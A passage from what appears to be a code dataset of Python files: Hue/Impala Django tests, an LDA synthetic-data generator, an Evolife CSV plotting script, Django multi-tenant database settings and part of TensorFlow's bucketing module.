beeswax_resp = self.client.get(reverse('beeswax:api_autocomplete_columns', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n beeswax_columns = json.loads(beeswax_resp.content)['columns']\n return impala_columns, beeswax_columns\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n assert_equal(impala_columns, beeswax_columns,\n \"\\ntest_refresh_table: `%s`.`%s`\\nImpala Columns: %s\\nBeeswax Columns: %s\" % (self.DATABASE, 'tweets', ','.join(impala_columns), ','.join(beeswax_columns)))\n\n hql = \"\"\"\n ALTER TABLE tweets ADD COLUMNS (new_column INT);\n \"\"\"\n resp = _make_query(self.client, hql, wait=True, local=False, max=180.0, database=self.DATABASE)\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n # New column is not found by Impala\n assert_true('new_column' in beeswax_columns, beeswax_columns)\n assert_false('new_column' in impala_columns, impala_columns)\n\n resp = self.client.post(reverse('impala:refresh_table', kwargs={'database': self.DATABASE, 'table': 'tweets'}))\n\n impala_columns, beeswax_columns = get_impala_beeswax_columns()\n # Invalidate picks up new column\n assert_equal(impala_columns, beeswax_columns,\n \"\\ntest_refresh_table: `%s`.`%s`\\nImpala Columns: %s\\nBeeswax Columns: %s\" % (self.DATABASE, 'tweets', ','.join(impala_columns), ','.join(beeswax_columns)))\n\n\n def test_get_exec_summary(self):\n query = \"\"\"\n SELECT COUNT(1) FROM tweets;\n \"\"\"\n\n response = _make_query(self.client, query, database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n wait_for_query_to_finish(self.client, response, max=180.0)\n\n resp = self.client.post(reverse('impala:get_exec_summary', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('nodes' in data['summary'], data)\n assert_true(len(data['summary']['nodes']) > 0, data['summary']['nodes'])\n\n # Attempt to call get_exec_summary on a closed query\n resp = self.client.post(reverse('impala:get_exec_summary', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('nodes' in data['summary'], data)\n assert_true(len(data['summary']['nodes']) > 0, data['summary']['nodes'])\n\n\n def test_get_runtime_profile(self):\n query = \"\"\"\n SELECT COUNT(1) FROM tweets;\n \"\"\"\n\n response = _make_query(self.client, query, 
database=self.DATABASE, local=False, server_name='impala')\n content = json.loads(response.content)\n query_history = QueryHistory.get(content['id'])\n\n wait_for_query_to_finish(self.client, response, max=180.0)\n\n resp = self.client.post(reverse('impala:get_runtime_profile', kwargs={'query_history_id': query_history.id}))\n data = json.loads(resp.content)\n assert_equal(0, data['status'], data)\n assert_true('Execution Profile' in data['profile'], data)\n\n\n# Could be refactored with SavedQuery.create_empty()\ndef create_saved_query(app_name, owner):\n query_type = SavedQuery.TYPES_MAPPING[app_name]\n design = SavedQuery(owner=owner, type=query_type)\n design.name = 'create_saved_query'\n design.desc = ''\n design.data = hql_query('show $tables', database='db1').dumps()\n design.is_auto = False\n design.save()\n\n Document.objects.link(design, owner=design.owner, extra=design.type, name=design.name, description=design.desc)\n\n return design\n\n\ndef test_ssl_cacerts():\n for desktop_kwargs, conf_kwargs, expected in [\n ({'present': False}, {'present': False}, ''),\n ({'present': False}, {'data': 'local-cacerts.pem'}, 'local-cacerts.pem'),\n\n ({'data': 'global-cacerts.pem'}, {'present': False}, 'global-cacerts.pem'),\n ({'data': 'global-cacerts.pem'}, {'data': 'local-cacerts.pem'}, 'local-cacerts.pem'),\n ]:\n resets = [\n desktop_conf.SSL_CACERTS.set_for_testing(**desktop_kwargs),\n conf.SSL.CACERTS.set_for_testing(**conf_kwargs),\n ]\n\n try:\n assert_equal(conf.SSL.CACERTS.get(), expected,\n 'desktop:%s conf:%s expected:%s got:%s' % (desktop_kwargs, conf_kwargs, expected, conf.SSL.CACERTS.get()))\n finally:\n for reset in resets:\n reset()\n\n\ndef test_ssl_validate():\n for desktop_kwargs, conf_kwargs, expected in [\n ({'present': False}, {'present': False}, True),\n ({'present': False}, {'data': False}, False),\n ({'present': False}, {'data': True}, True),\n\n ({'data': False}, {'present': False}, False),\n ({'data': False}, {'data': False}, False),\n ({'data': False}, {'data': True}, True),\n\n ({'data': True}, {'present': False}, True),\n ({'data': True}, {'data': False}, False),\n ({'data': True}, {'data': True}, True),\n ]:\n resets = [\n desktop_conf.SSL_VALIDATE.set_for_testing(**desktop_kwargs),\n conf.SSL.VALIDATE.set_for_testing(**conf_kwargs),\n ]\n\n try:\n assert_equal(conf.SSL.VALIDATE.get(), expected,\n 'desktop:%s conf:%s expected:%s got:%s' % (desktop_kwargs, conf_kwargs, expected, conf.SSL.VALIDATE.get()))\n finally:\n for reset in resets:\n reset()\n\n\nclass TestImpalaDbms():\n\n def test_get_impala_nested_select(self):\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'id', None), ('id', '`default`.`customers`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'email_preferences', 'categories/promos/'),\n ('email_preferences.categories.promos', '`default`.`customers`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'addresses', 'key'),\n ('key', '`default`.`customers`.`addresses`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'addresses', 'value/street_1/'),\n ('street_1', '`default`.`customers`.`addresses`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'orders', 'item/order_date'),\n ('order_date', '`default`.`customers`.`orders`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'orders', 'item/items/item/product_id'),\n ('product_id', '`default`.`customers`.`orders`.`items`'))\n"} {"ext": "py", "sha": 
"1a2ed0f63f2195f08946f3130775ae4a141631b0", "content": "# vim: set encoding=utf-8\n\n# Copyright (c) 2016 Intel Corporation \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#       http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport random\nimport math\n\ndef concat(list):\n return reduce(lambda l, c: l+c, list, [])\n\ndef makedata(topic_count, word_count, paper_count, common_words, number_topics_paper=1, word_count_min=1, word_count_max=20, common_word_count_min=10, common_word_count_max=100):\n\n # generate topic specific words\n # res :: [[[(string, string, string, string)]]]\n with open(\"lda_big.csv\", \"w\", 10**9) as f:\n for paper in range(paper_count):\n for topicval in [random.randint(1, topic_count) for _ in range(number_topics_paper)]:\n for word in range(word_count):\n f.write(','.join((\"paper-\"+str(paper),\"word-\"+str(word)+str(topicval), str(random.randint(word_count_min,word_count_max)), str(topicval), \"\\n\")))\n\n # generate general words\n # res2 :: [[(string, string, string, string)]]\n for paper in range(paper_count):\n for word in range(common_words):\n f.write(','.join((\"paper-\"+str(paper),\"word-\"+str(word), str(int(math.ceil(random.uniform(common_word_count_min, common_word_count_max)))), \"-1\", \"\\n\")))\n \n\nif __name__ == '__main__':\n makedata(10000, 1000, 20000, 100000)\n"} {"ext": "py", "sha": "1a2ed1b0af58417fbaec840751451fe72805fac0", "content": "#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n#\nfrom .misc import *\n"} {"ext": "py", "sha": "1a2ed1d24a934ad713b86596821a24ca5ddd831a", "content": "#!/usr/bin/env python3\n##############################################################################\n# EVOLIFE http://evolife.telecom-paris.fr Jean-Louis Dessalles #\n# Telecom Paris 2021 www.dessalles.fr #\n# -------------------------------------------------------------------------- #\n# License: Creative Commons BY-NC-SA #\n##############################################################################\n\n##############################################################################\n# Draw curves offline using matplotlib #\n##############################################################################\n\n\"\"\" Draw curves offline.\n\tTakes a csv file as input and draws curves.\n\tCreates image file.\n\"\"\"\n\n\nimport sys\nimport os\nimport re\nimport glob\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\t# to use offline\nimport matplotlib.pyplot as plt\n\n\nimport logging\t# for tracing\n# modifying print priority of console handler\nlogging.basicConfig(level='WARNING')\n\nsys.path.append('..')\nsys.path.append('../..')\nsys.path.append('../../..')\nsys.path.append('../../../..')\nimport Evolife.Scenarii.Parameters as EP\n\n\ntry:\timport TableCsv as CSV\nexcept ImportError:\timport Evolife.Tools.TableCsv as CSV\n\n\ndef figsave(FileName):\n\tif os.path.exists(FileName):\tos.remove(FileName)\n\tplt.savefig(FileName)\n\tprint(\"%s created\" % FileName)\n\ndef str2nb(x):\t\n\ttry: return int(x)\n\texcept ValueError:\treturn float(x)\n\t\n\t\n\t\n\"\"\"\n\t\nplt.plot(*zip(*Maxima), c='k', linewidth=1, marker='o')\t\n\t\n\nplt.clf()\nplt.scatter(alphaValues, [p[1] for p in Prices], color=colours, s=44)\nplt.plot(alphaValues, [p[1] for p in Prices], 'r', label='Signal prices')\nplt.scatter(alphaValues, [thetaU(a, UC) for a in alphaValues], color=colours, s=44)\n\n\"\"\"\n\nclass Plot:\n\tdef __init__(self, ExpeFile, FieldDraw=True, ConstantConfigFileName=None):\t\n\t\tself.ExpeFile = os.path.splitext(ExpeFile)[0]\n\t\tif self.ExpeFile.endswith('_res'):\t\n\t\t\tself.ExpeFile = self.ExpeFile[:-4]\n\t\t\tSkipFile = True\t# not a data file\n\t\tOutputFile = self.ExpeFile + '.png'\n\t\tif not os.path.exists(OutputFile):\n\t\t\tself.Dirname, self.ExpeName = os.path.split(self.ExpeFile)\n\t\t\tPlotFile = self.ExpeFile + '.csv'\n\t\t\tself.ConfigFileName = self.ExpeFile + '_res.csv'\n\t\t\tself.Cfg = self.RetrieveConfig(self.ConfigFileName)\t# retrieve actual parameters from _res file\n\t\t\tself.RelevantParam = self.RelevantConfig(self.ExpeName, ConstantConfigFileName)\t# display parameters \n\t\t\t# drawing curves\n\t\t\tplt.figure(1, figsize=(6 + 6 * FieldDraw, 4))\n\t\t\tif FieldDraw:\tplt.subplot(1,2,1)\n\t\t\tymax = self.Draw_Curve(PlotFile)\n\t\t\tif self.RelevantParam:\tplt.title(' '.join(sorted(['%s = %s' % (P, self.RelevantParam[P]) for P in 
self.RelevantParam])))\n\t\t\tif FieldDraw:\t\n\t\t\t\t# drawing field\n\t\t\t\tplt.subplot(1,2,2)\n\t\t\t\t# self.Draw_Field(self.ExpeFile + '_dmp.csv', ymax=ymax)\n\t\t\t\tself.Draw_Field(self.ExpeFile + '_dmp.csv', ymax=100)\n\t\t\t\tplt.title(self.ExpeFile)\n\t\t\tself.save(OutputFile)\n\t\telse:\tprint('%s already exists' % OutputFile)\n\t\t\t\n\t\t\n\tdef Draw_Curve(self, CurveFileName):\n\t\t# colours = ['#000000', '#00BF00', '#78FF78', '#BF0000', '#FF7878', '#0000BF', '#7878FF']\n\t\tcolours = ['#00BF00', '#78FF78', '#BF0000', '#FF7878', '#0000BF', '#7878FF']\n\t\t# Retrieving coordinates\n\t\tPlotOrders = CSV.load(CurveFileName, sniff=True)\t# loading csv file\n\t\t# Retrieving legend\n\t\ttry:\tLegend = next(PlotOrders)\t\t# reading first line with curve names\n\t\texcept StopIteration:\tsys.exit(0)\n\t\t# Retrieving data\n\t\tData = list(zip(*PlotOrders))\n\t\tData = list(map(lambda L: list(map(str2nb, L)), Data))\n\t\t# Data = list(map(lambda L: list(map(str2nb, L)), [*PlotOrders]))\n\t\tfor Col in range(1,len(Data)):\n\t\t\tplt.plot(Data[0], Data[Col], linewidth=2, color=colours[Col-1], label=Legend[Col])\t\n\t\tx1,x2,y1,y2 = plt.axis()\n\t\tplt.axis((x1, x2, 0, y2+0.05))\n\t\t# plt.ylim(top=100)\n\t\tplt.xlabel('year')\n\t\t# plt.ylabel('price or sales')\n\t\t# plt.legend(bbox_to_anchor=(0.1, 1))\n\t\tplt.legend(loc='upper right')\n\t\treturn plt.ylim()[1]\t# max coordinate\n\t\t\n\t@classmethod\n\tdef RetrieveConfig(self, ConfigFile):\n\t\t\" Retrieves parameters from _res file \"\n\t\tif os.path.exists(ConfigFile):\n\t\t\tCfgLines = open(ConfigFile).readlines()\n\t\t\t# reading parameters\n\t\t\tSep = max([';', '\\t', ','], key=lambda x: CfgLines[0].count(x))\n\t\t\tif len(CfgLines) > 1:\n\t\t\t\tParameters = dict(zip(*map(lambda x: x.strip().split(Sep), CfgLines[:2])))\n\t\t\t\treturn EP.Parameters(ParamDict=Parameters)\n\t\treturn None\n\t\t\n\tdef RelevantConfig(self, ExpeName, ConstantParameterFile):\n\t\t\" Try to find relevant parameters \"\n\t\tIrrelevant = ['BatchMode', 'DisplayPeriod', 'TimeLimit', 'DumpStart']\n\t\tif self.Cfg is None or not ConstantParameterFile:\t\n\t\t\tprint('ConfigFile not found')\n\t\t\treturn None\n\t\tRelevantParameters = {}\n\t\tCP = EP.Parameters(ConstantParameterFile)\n\t\t# determining relevant parameters\n\t\tfor p in CP:\n\t\t\tif p in Irrelevant:\tcontinue\n\t\t\tif p in self.Cfg and CP[p] != self.Cfg[p]:\n\t\t\t\t# print(p, RelevantParameters[p], self.Cfg[p])\n\t\t\t\tRelevantParameters[p] = self.Cfg[p]\n\t\t\t\t# CP.addParameter(p, self.Cfg[p])\n\t\tRelevantParameters = EP.Parameters(ParamDict=RelevantParameters)\n\t\tprint(RelevantParameters)\n\t\treturn RelevantParameters\n\t\t\n\tdef Draw_Field(self, DumpFile, ymax=None):\n\t\tif not os.path.exists(DumpFile):\treturn None\n\t\tLines = open(DumpFile).readlines()\n\t\t# reading recorded positions\n\t\tFieldPlot = None\n\t\tif len(Lines) > 1:\n\t\t\tFieldPlot = Lines[1].strip().split(';')[1:]\n\t\t\tNbP = len(FieldPlot)\n\t\t\tplt.scatter(list(range(NbP)), list(map(float, FieldPlot)), s=11)\n\t\t\t# print(FieldPlot)\n\t\t\tif ymax is not None:\n\t\t\t\tplt.ylim(top=ymax)\n\t\t\tplt.xlabel('quality')\n\t\t\tplt.ylabel('signal')\n\t\treturn FieldPlot\n\t\t\n\tdef save(self, OutputFile): figsave(OutputFile)\n\ndef Parse(Args):\n\tFiles = []\n\tConstantConfigFileName = None\n\tif len(Args) < 2:\n\t\t# find last file\n\t\tCsvFiles = glob.glob('___Results/*.csv')\n\t\tif CsvFiles:\n\t\t\tCsvFiles.sort(key=lambda x: os.stat(x).st_mtime)\n\t\t\tFiles = [CsvFiles[-1]]\n\telif len(Args) > 
3:\n\t\tprint('''Usage:\t%s []''' % os.path.basename(Args[0]))\n\telse:\n\t\tFiles = glob.glob(Args[1])\n\t\tConstantConfigFileName = Args[2] if (len(Args) == 3) else None\n\tfor Argfile in Files:\n\t\tyield (Argfile, ConstantConfigFileName)\n\t\nif __name__ == \"__main__\":\n\tfor (Argfile, ConstantConfigFileName) in Parse(sys.argv):\n\t\tif Argfile:\n\t\t\tprint(Argfile)\n\t\t\tplot = Plot(Argfile, FieldDraw=True, ConstantConfigFileName=ConstantConfigFileName)\n\t\t\t# print()\n\n__author__ = 'Dessalles'\n"} {"ext": "py", "sha": "1a2ed1edc9f9195a4dab60e84c698275f4b1aa32", "content": "from .settings import *\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n 'db1': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project1'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n 'db2': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project2'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n\n}"} {"ext": "py", "sha": "1a2ed1f5b3c5dda671b90424d004600ad3dfc622", "content": "# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Operations for bucketing data into groups.\n\nThe classes and functions in this module are used to queue up data into\nbuckets conditional on side information (e.g. 
sequence length).\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.summary import summary\nfrom tensorflow.python.training import input as input_py\nfrom tensorflow.python.training import queue_runner\n\n# pylint: disable=protected-access\n_as_original_type = input_py._as_original_type\n_as_tensor_list = input_py._as_tensor_list\n_restore_sparse_tensors = input_py._restore_sparse_tensors\n_dtypes = input_py._dtypes\n_store_sparse_tensors = input_py._store_sparse_tensors\n_shapes = input_py._shapes\n_which_queue = input_py._which_queue\n\n# pylint: enable=protected-access\n\n\ndef _validate_bucket(tensor_list):\n tensor_list = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)\n if not tensor_list:\n raise ValueError(\"Expected at least one tensor in bucket().\")\n return tensor_list\n\n\ndef bucket(tensors,\n which_bucket,\n batch_size,\n num_buckets,\n num_threads=1,\n capacity=32,\n shapes=None,\n dynamic_pad=False,\n allow_smaller_final_batch=False,\n keep_input=None,\n shared_name=None,\n name=None):\n \"\"\"Lazy bucketing of input tensors according to `which_bucket`.\n\n The argument `tensors` can be a list or a dictionary of tensors.\n The value returned by the function will be of the same type\n as `tensors`.\n\n The tensors entering this function are put into the bucket given by\n `which_bucket`. Each bucket has its own queue. When a bucket contains\n `batch_size` elements, this minibatch is pushed onto a top queue. The\n tensors returned from this function are a the result of dequeueing the\n next minibatch from this top queue.\n\n This function is implemented using several queues. A `QueueRunner` for the\n queues is added to the current `Graph`'s `QUEUE_RUNNER` collection.\n\n As the returned tensors are the result of of a dequeue operation, evaluating\n them will throw a `tf.errors.OutOfRangeError` when the input queue is\n exhausted. If these tensors are feeding another input queue, its queue runner\n will catch this exception, however, if they are used in your main thread\n you are responsible for catching this yourself.\n\n *N.B.:* If `dynamic_pad` is `False`, you must ensure that either\n (i) the `shapes` argument is passed, or (ii) all of the tensors in\n `tensors` must have fully-defined shapes. `ValueError` will be\n raised if neither of these conditions holds.\n\n If `dynamic_pad` is `True`, it is sufficient that the *rank* of the\n tensors is known, but individual dimensions may have shape `None`.\n In this case, for each enqueue the dimensions with value `None`\n may have a variable length; upon dequeue, the output tensors will be padded\n on the right to the maximum shape of the tensors in the current minibatch.\n For numbers, this padding takes value 0. For strings, this padding is\n the empty string. 
See `PaddingFIFOQueue` for more info.\n\n If `allow_smaller_final_batch` is `True`, a smaller batch value than\n `batch_size` is returned when the queues are closed and there are not enough\n elements to fill the batch, otherwise the pending elements are discarded.\n In addition, all output tensors' static shapes, as accessed via the\n `get_shape()` method will have a 0th `Dimension` value of `None`, and\n operations that depend on fixed batch_size would fail.\n\n Args:\n tensors: The list or dictionary of tensors, representing a single element,\n to bucket. Nested lists are not supported.\n which_bucket: An `int32` scalar Tensor taking a value in `[0, num_buckets)`.\n batch_size: The new batch size pulled from the queue (all queues will have\n the same size). If a list is passed in then each bucket will have a\n different batch_size.\n (python int, int32 scalar or iterable of integers of length num_buckets).\n num_buckets: A python integer, the number of buckets.\n num_threads: An integer. The number of threads enqueuing `tensors`.\n capacity: An integer. The maximum number of minibatches in the top queue,\n and also the maximum number of elements within each bucket.\n shapes: (Optional) The shapes for each example. Defaults to the\n inferred shapes for `tensors`.\n dynamic_pad: Boolean. Allow variable dimensions in input shapes.\n The given dimensions are padded upon dequeue so that tensors within a\n batch have the same shapes.\n allow_smaller_final_batch: (Optional) Boolean. If `True`, allow the final\n batches to be smaller if there are insufficient items left in the queues.\n keep_input: (Optional). A `bool` scalar Tensor. If provided, this tensor\n controls whether the input is added to the queue or not. If it evaluates\n `True`, then `tensors` are added to the bucket; otherwise they are\n dropped. This tensor essentially acts as a filtering mechanism.\n The default behavior is to assume `keep_input=True`.\n shared_name: (Optional). 
If set, the queues will be shared under the given\n name across multiple sessions.\n name: (Optional) A name for the operations.\n\n Returns:\n A tuple `(bucket, outputs)` where `bucket` is\n a `int32` scalar tensor and `outputs` is a list or\n dictionary of batched outputs corresponding to elements of `tensors`.\n Every step will receive a new bucket of outputs.\n\n Raises:\n ValueError: If the `shapes` are not specified, and cannot be\n inferred from the elements of `tensors` or if batch_size is a sequence\n but it's length != num_buckets.\n \"\"\"\n batch_size_per_bucket = False\n if isinstance(batch_size, (list, tuple)):\n batch_size_per_bucket = True\n if len(batch_size) != num_buckets:\n raise ValueError(\n \"If batch_size is a list it must have num_buckets elements\")\n else:\n batch_size = [batch_size] * num_buckets\n tensor_list = _as_tensor_list(tensors)\n with ops.name_scope(name, \"bucket\", tensor_list) as name:\n tensor_list = _validate_bucket(tensor_list)\n (tensor_list, sparse_info) = _store_sparse_tensors(\n tensor_list, enqueue_many=False, keep_input=constant_op.constant(True))\n\n # Round-trip batch_size to a tensor, and possibly back\n for i, bucket_batch_size in enumerate(batch_size):\n bucket_batch_size = ops.convert_to_tensor(\n bucket_batch_size, dtype=dtypes.int32, name=\"batch_size\")\n static_batch_size = tensor_util.constant_value(bucket_batch_size)\n batch_size[i] = (static_batch_size if static_batch_size is not None else\n bucket_batch_size)\n\n types = _dtypes([tensor_list])\n shapes = _shapes([tensor_list], shapes, enqueue_many=False)\n\n which_bucket = ops.convert_to_tensor(\n which_bucket, dtype=dtypes.int32, name=\"which_bucket\")\n\n queue_creator = _which_queue(dynamic_pad)\n bucket_queues = []\n for i in range(num_buckets):\n shared_name_i = (\"%s_%d\" % (shared_name, i) if shared_name is not None\n else None)\n bucket_queues.append(\n queue_creator(\n capacity=capacity,\n dtypes=types,\n shapes=shapes,\n shared_name=shared_name_i,\n name=\"bucket_queue_%d\" % i))\n\n maybe_static_batch_size = (\n None if (allow_smaller_final_batch or batch_size_per_bucket)\n else static_batch_size)\n\n bucket_shapes = [\n tensor_shape.vector(maybe_static_batch_size).concatenate(s)\n for s in bucket_queues[0].shapes\n ]\n # top_queue is a PaddingFIFOQueue even if the bucket queues are regular FIFO\n # queues because if we use allow_smaller_final_batch, shapes will\n # contain Nones in their first entry; as a result, a regular\n # FIFOQueue would die when being passed shapes that are not fully defined.\n top_queue = data_flow_ops.PaddingFIFOQueue(\n capacity=capacity,\n dtypes=[dtypes.int32] + types,\n shapes=[tensor_shape.scalar()] + bucket_shapes,\n shared_name=shared_name,\n name=\"top_queue\")\n\n def enqueue_which():\n\n def enqueue_single(i):\n return bucket_queues[i].enqueue(tensor_list)\n\n enqueues = [\n control_flow_ops.cond(\n math_ops.equal(which_bucket, i),\n functools.partial(enqueue_single, i), control_flow_ops.no_op)\n for i in range(num_buckets)\n ]\n return control_flow_ops.group(*enqueues, name=\"group_enqueues\")\n\n if keep_input is not None:\n # TODO(ebrevdo): Expand keep_input param to core training\n # methods, and pipe through to _store_sparse_tensors; so\n # that expensive serialization is guarded by keep_input.\n maybe_enqueue = control_flow_ops.cond(keep_input, enqueue_which,\n control_flow_ops.no_op)\n else:\n maybe_enqueue = enqueue_which()\n\n bucket_enqueue_ops = [maybe_enqueue] * num_threads\n\n if allow_smaller_final_batch:\n 
which_dequeue = lambda q: q.dequeue_up_to\n else:\n which_dequeue = lambda q: q.dequeue_many\n\n enqueues_to_top = [\n top_queue.enqueue(\n [constant_op.constant(i)] + which_dequeue(q)(\n bs, name=\"read_bucket_%d\" % i),\n name=\"enqueue_from_bucket_%d\" % i)\n for i, (q, bs) in enumerate(zip(bucket_queues, batch_size))\n ]\n\n for i, q in enumerate(bucket_queues):\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(\n q, [enqueues_to_top[i]],\n queue_closed_exception_types=(errors.OutOfRangeError,\n errors.CancelledError)))\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(\n top_queue,\n bucket_enqueue_ops,\n queue_closed_exception_types=(errors.OutOfRangeError,\n errors.CancelledError)))\n\n for q in bucket_queues:\n summary.scalar(\"bucket/%s/size\" % q.name,\n math_ops.cast(top_queue.size(), dtypes.float32))\n summary.scalar(\"bucket/%s/fraction_of_%d_full\" % (top_queue.name, capacity),\n math_ops.cast(top_queue.size(), dtypes.float32) *\n (1. / capacity))\n\n dequeued = top_queue.dequeue(name=\"dequeue_top\")\n which_bucket_dequeued = dequeued[0]\n dequeued = dequeued[1:]\n dequeued = _restore_sparse_tensors(dequeued, sparse_info)\n return (which_bucket_dequeued, _as_original_type(tensors, dequeued))\n\n\ndef bucket_by_sequence_length(input_length,\n tensors,\n batch_size,\n bucket_boundaries,\n num_threads=1,\n capacity=32,\n shapes=None,\n dynamic_pad=False,\n allow_smaller_final_batch=False,\n keep_input=None,\n shared_name=None,\n name=None):\n \"\"\"Lazy bucketing of inputs according to their length.\n\n This method calls `tf.contrib.training.bucket` under the hood, after first\n subdividing the bucket boundaries into separate buckets and identifying which\n bucket the given `input_length` belongs to. See the documentation for\n `which_bucket` for details of the other arguments.\n\n Args:\n input_length: `int32` scalar `Tensor`, the sequence length of tensors.\n tensors: The list or dictionary of tensors, representing a single element,\n to bucket. Nested lists are not supported.\n batch_size: The new batch size pulled from the queue (all queues will have\n the same size). If a list is passed in then each bucket will have a\n different batch_size.\n (python int, int32 scalar or iterable of integers of length num_buckets).\n bucket_boundaries: int list, increasing non-negative numbers.\n The edges of the buckets to use when bucketing tensors. Two extra buckets\n are created, one for `input_length < bucket_boundaries[0]` and\n one for `input_length >= bucket_boundaries[-1]`.\n num_threads: An integer. The number of threads enqueuing `tensors`.\n capacity: An integer. The maximum number of minibatches in the top queue,\n and also the maximum number of elements within each bucket.\n shapes: (Optional) The shapes for each example. Defaults to the\n inferred shapes for `tensors`.\n dynamic_pad: Boolean. Allow variable dimensions in input shapes.\n The given dimensions are padded upon dequeue so that tensors within a\n batch have the same shapes.\n allow_smaller_final_batch: (Optional) Boolean. If `True`, allow the final\n batches to be smaller if there are insufficient items left in the queues.\n keep_input: (Optional). A `bool` scalar Tensor. If provided, this tensor\n controls whether the input is added to the queue or not. If it evaluates\n `True`, then `tensors` are added to the bucket; otherwise they are\n dropped. This tensor essentially acts as a filtering mechanism.\n The default behavior is to assume `keep_input=True`.\n shared_name: (Optional). 
